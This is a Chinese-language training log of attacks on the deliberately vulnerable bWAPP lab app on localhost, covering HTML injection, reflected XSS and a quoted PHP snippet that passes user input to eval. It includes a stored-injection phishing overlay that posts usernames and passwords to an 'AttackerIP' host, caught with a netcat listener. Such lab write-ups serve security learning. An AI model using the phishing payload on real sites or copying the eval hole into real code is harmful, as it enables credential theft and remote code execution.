bWAPP靶场记录

bWAPP靶场训练记录，之前就搭好的，一直没练，现在有空练一下

主要内容有：一个很综合的靶场，不错！

SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
Blind SQL and Blind OS Command injection
Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
Cross-Site Request Forgery (CSRF)
AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
Malicious, unrestricted file uploads and backdoor files
Authentication, authorization and session management issues
Arbitrary file access and directory traversals
Local and remote file inclusions (LFI/RFI)
Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
HTTP parameter pollution and HTTP response splitting
Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards, and cookie poisoning
Cookie poisoning and insecure cryptographic storage
Server Side Request Forgery (SSRF)
XML External Entity attacks (XXE)
And much much much more…

A1 Injection

HTML Injection - Reflected (GET)

get型的html注入

http://127.0.0.1/bWAPP/bWAPP/htmli_get.php?firstname=%3Ch1%3Etest%3Ch1%3E&lastname=%3Ch1%3Etest%3Ch1%3E&form=submit

也可以使用xss

HTML Injection - Reflected (POST)

通过hackbar提交POST请求即可

HTML Injection - Reflected (URL)

尝试XSS

http://127.0.0.1/bWAPP/bWAPP/htmli_current_url.php?a=%3Cscript%3Ealert(/xss/)%3C/script%3E

bp抓包之后对编码进行修改

GET /bWAPP/bWAPP/htmli_current_url.php/?a=<script>alert(/xss/)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: PHPSESSID=r4h29vbhsl8upskjm0bs4ve575; security_level=0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

原理如此，但这个只能在IE浏览器才能成功。

HTML Injection - Stored (Blog)

可以XSS

看了网上以为老外写的exp

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://AttackerIP/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

攻击机：nc -l 80

iFrame Injection

http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250

OS Command Injection

命令注入，跟DVWA的很类似

OS Command Injection - Blind

跟SQL盲注类似，根据时间判断命令是否执行成功

PHP Code Injection

<?php

if(isset($_REQUEST["message"]))
{

    // If the security level is not MEDIUM or HIGH
    if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>
    <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>

<?php